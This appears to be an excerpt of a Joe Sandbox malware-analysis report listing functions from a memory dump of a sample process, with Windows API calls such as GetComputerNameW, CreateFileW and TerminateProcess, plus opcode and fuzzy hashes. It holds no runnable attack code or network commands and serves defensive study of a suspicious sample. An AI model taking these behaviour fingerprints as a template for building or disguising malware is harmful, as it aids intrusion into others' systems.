                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                            • Opcode ID: c6e06aefdd90c4332fb3b1ab7ddd222b80ddc45f4a35a6cf89b97a083f161024
                                                                                                                                                                            • Instruction ID: 994e3f4440148fdde58a05923e755670cb20e9e21ec2f882978a54792158a997
                                                                                                                                                                            • Opcode Fuzzy Hash: c6e06aefdd90c4332fb3b1ab7ddd222b80ddc45f4a35a6cf89b97a083f161024
                                                                                                                                                                            • Instruction Fuzzy Hash: 06F0A43450020DF78B00BAA8DC5699DBB6CFE00314B90C160BA1CD55EBEB70EA56D992
                                                                                                                                                                            Function 008AE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                            • Opcode ID: 87c4e3e48001c1f02f7fd7eaeee35763afd2a451ddfd0f0e00589399ec0bc328
                                                                                                                                                                            • Instruction ID: 03cfa5d55936d90261ffab2ff39877718b2c4ab69b90b02329293ccdd10c9257
                                                                                                                                                                            • Opcode Fuzzy Hash: 87c4e3e48001c1f02f7fd7eaeee35763afd2a451ddfd0f0e00589399ec0bc328
                                                                                                                                                                            • Instruction Fuzzy Hash: B3D012A1C0411CD9DB909AD0D8488BE737CF729308F508C52F506D1440EA349548E722
                                                                                                                                                                            Function 008D88B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008D8C52
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 008D8C59
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 008D8E3A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                            • Opcode ID: e8c2b4b6ec0dbfd1bac79e0a5fbab853841c50f914a14b62a5f64d8e5015f97c
                                                                                                                                                                            • Instruction ID: 5e04fae8e58ab8ef15a747f4e57f32bbe7110385c9e95fc0af64adde16d7626e
                                                                                                                                                                            • Opcode Fuzzy Hash: e8c2b4b6ec0dbfd1bac79e0a5fbab853841c50f914a14b62a5f64d8e5015f97c
                                                                                                                                                                            • Instruction Fuzzy Hash: A5123871A08341DFC714DF28C484A6ABBE5FF85314F14895EE899CB392DB31E945CB92
                                                                                                                                                                            Function 00852735 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00853205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00853236
                                                                                                                                                                              • Part of subcall function 00853205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0085323E
                                                                                                                                                                              • Part of subcall function 00853205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00853249
                                                                                                                                                                              • Part of subcall function 00853205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00853254
                                                                                                                                                                              • Part of subcall function 00853205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0085325C
                                                                                                                                                                              • Part of subcall function 00853205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00853264
                                                                                                                                                                              • Part of subcall function 0085318C: RegisterWindowMessageW.USER32(00000004,?,00852906), ref: 008531E4
                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008529AC
                                                                                                                                                                            • OleInitialize.OLE32 ref: 008529CA
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 008939E7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1986988660-0
                                                                                                                                                                            • Opcode ID: 567ed9ac65fc25af07a8322b6c19e353a2e04b64233a1b4cd00b8220b011ff71
                                                                                                                                                                            • Instruction ID: dfd9cb14163e3527b2ad5e16e1dd23af51cd6300b6540cc5f91338bdd6ff1d6a
                                                                                                                                                                            • Opcode Fuzzy Hash: 567ed9ac65fc25af07a8322b6c19e353a2e04b64233a1b4cd00b8220b011ff71
                                                                                                                                                                            • Instruction Fuzzy Hash: 1971A1B0929340AEC3A8EF7DEC69A153BE0FB59305350812EE509C7376EB30954AEF55
                                                                                                                                                                            Function 00856BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00856CA1
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00856CB1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: da44574a62a4c00d0e811a861c2a44915571fd606a0e53df1c2950ec64f926c2
                                                                                                                                                                            • Instruction ID: 9709d22116107563843e64300ca5be58c6035303284b04cf9c90cfb60f49a73c
                                                                                                                                                                            • Opcode Fuzzy Hash: da44574a62a4c00d0e811a861c2a44915571fd606a0e53df1c2950ec64f926c2
                                                                                                                                                                            • Instruction Fuzzy Hash: DA313A71A00609EFDB14CF68C980B99BBB5FB44315F548629ED15E7240E7B1BEA8CB90
                                                                                                                                                                            Function 0086FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00855F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00856049
                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0086FD44
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0086FD53
                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008AFDD3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                            • Opcode ID: 40ba2cd972982bb1eb47dc1f7ec8fe1ef9744a357fac3722f5293e4dca1e59d3
                                                                                                                                                                            • Instruction ID: ec4b45cc74b59ff0a5c270cc26f684028834b8f97c8f19482d03e531fd90b472
                                                                                                                                                                            • Opcode Fuzzy Hash: 40ba2cd972982bb1eb47dc1f7ec8fe1ef9744a357fac3722f5293e4dca1e59d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E31B170904344AFEB22CF648885BE6BBECFB12708F0004AEE699D7242C7745A89CB51
                                                                                                                                                                            Function 00888A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,0088895C,?,00919CE8,0000000C), ref: 00888A94
                                                                                                                                                                            • GetLastError.KERNEL32(?,0088895C,?,00919CE8,0000000C), ref: 00888A9E
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00888AC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2583163307-0
                                                                                                                                                                            • Opcode ID: 024df86c35d4e9e123361febdc9daae4238d7b7b84769b1ad415ed99c307e29c
                                                                                                                                                                            • Instruction ID: 181e1082eab92bc13f9c4e50206a3930e53fc0c0a178190f6259dab2d9545a8b
                                                                                                                                                                            • Opcode Fuzzy Hash: 024df86c35d4e9e123361febdc9daae4238d7b7b84769b1ad415ed99c307e29c
                                                                                                                                                                            • Instruction Fuzzy Hash: E8016B32605270CAD22873786885B7E674AFB81B34F69021AF828CB1D2DE20DC859393
                                                                                                                                                                            Function 0088971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,008897CA,FF8BC369,00000000,00000002,00000000), ref: 00889754
                                                                                                                                                                            • GetLastError.KERNEL32(?,008897CA,FF8BC369,00000000,00000002,00000000,?,00885EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00876F61), ref: 0088975E
                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00889765
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                            • Opcode ID: 3f5bdea5c2e88978221e4f92979df3cd1be95fca0d018367a41bc0743b9c4d20
                                                                                                                                                                            • Instruction ID: 560de92a0043d2644c141e83716f354c16e4e6de6a8e48c0aa39d49bb8d6f23f
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f5bdea5c2e88978221e4f92979df3cd1be95fca0d018367a41bc0743b9c4d20
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B014C33620118AFCB05BFA9DC45CBE7B2AFF85330B280259F855CB191EA30DD019791
                                                                                                                                                                            Function 0085F1E8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 0085F22B
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 0085F239
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0085F24F
                                                                                                                                                                            • Sleep.KERNELBASE(0000000A), ref: 0085F261
                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 008A327C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3288985973-0
                                                                                                                                                                            • Opcode ID: 42f9d3b646eb4f84018a7ad5217669c204b54bd1fa954fa6c72de18520f7589f
                                                                                                                                                                            • Instruction ID: e7d07b8053dd78e38e920f8c7cc0f6d88b43a42ad54a8bf5a5b8595e979d6208
                                                                                                                                                                            • Opcode Fuzzy Hash: 42f9d3b646eb4f84018a7ad5217669c204b54bd1fa954fa6c72de18520f7589f
                                                                                                                                                                            • Instruction Fuzzy Hash: F0F05E305483819BF7348BA0DC89F9A73ACFB84302F000928F649C70C0DB30954C8B22
                                                                                                                                                                            Function 00862AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00862FB6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                            • String ID: CALL
                                                                                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                                                                                            • Opcode ID: bdc8efe84eb91d399d0921e5126ac7061b93684ebd7068b088efa1e8ecee0057
                                                                                                                                                                            • Instruction ID: 32e133e4e0cbda81f5e8f68d459022423867542866db4aafd0a69c644582d97f
                                                                                                                                                                            • Opcode Fuzzy Hash: bdc8efe84eb91d399d0921e5126ac7061b93684ebd7068b088efa1e8ecee0057
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E229770608605DFD724DF18C880A2ABBE1FF89314F15899DF49ACB3A2D732E945DB52
                                                                                                                                                                            Function 00853A1C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00894115
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                              • Part of subcall function 008539DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008539FD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                            • String ID: X
                                                                                                                                                                            • API String ID: 779396738-3081909835
                                                                                                                                                                            • Opcode ID: f99d7a31c22899890c68e762da939fa66a596974ec4eee2dcdb28d48f9dcbb9e
                                                                                                                                                                            • Instruction ID: f4cb8469a44fce116db5fcf8d0fee365cb340101ff5e6a7a3f2d1ce7ae700a9e
                                                                                                                                                                            • Opcode Fuzzy Hash: f99d7a31c22899890c68e762da939fa66a596974ec4eee2dcdb28d48f9dcbb9e
                                                                                                                                                                            • Instruction Fuzzy Hash: 2721A471A0425C9BCF11DF98C805AEE7BF9EF45705F004019E804E7281DBB45A8D8FA2
                                                                                                                                                                            Function 008AE6E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 008AE6F3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                                            • String ID: X64
                                                                                                                                                                            • API String ID: 3545744682-893830106
                                                                                                                                                                            • Opcode ID: ebd15c58c25c049ad0261afbf0056bfcb55c0f99c90bf636d3c0ed28120f44c3
                                                                                                                                                                            • Instruction ID: 1e6ffb30e4bad5252fae44ba942204141eb88b2f587be25175747e3245466f42
                                                                                                                                                                            • Opcode Fuzzy Hash: ebd15c58c25c049ad0261afbf0056bfcb55c0f99c90bf636d3c0ed28120f44c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FD0C9B480521CEADB91CF90DCC8DDD737CFB25308F104C55F002E2540DB7465489B10
                                                                                                                                                                            Function 008C95F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 008C9665
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008C9673
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfileStringWrite$FullNamePath
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3876400906-0
                                                                                                                                                                            • Opcode ID: 85cabbc7e69281236bbc1c044c1ce2c35026026a64fc2aa0c12070e9c48c2db0
                                                                                                                                                                            • Instruction ID: 1fe923cf94fc899fe3ef82aaa65b7aa4e149237b773a59492e93bb88682ee578
                                                                                                                                                                            • Opcode Fuzzy Hash: 85cabbc7e69281236bbc1c044c1ce2c35026026a64fc2aa0c12070e9c48c2db0
                                                                                                                                                                            • Instruction Fuzzy Hash: 031137796006299FCB01EB68C845D6EB7B5FF48360B058449EC56EB361CB30FD09CB91
                                                                                                                                                                            Function 00856E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00853B33,?,00008000), ref: 00856E80
                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00853B33,?,00008000), ref: 008959A2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
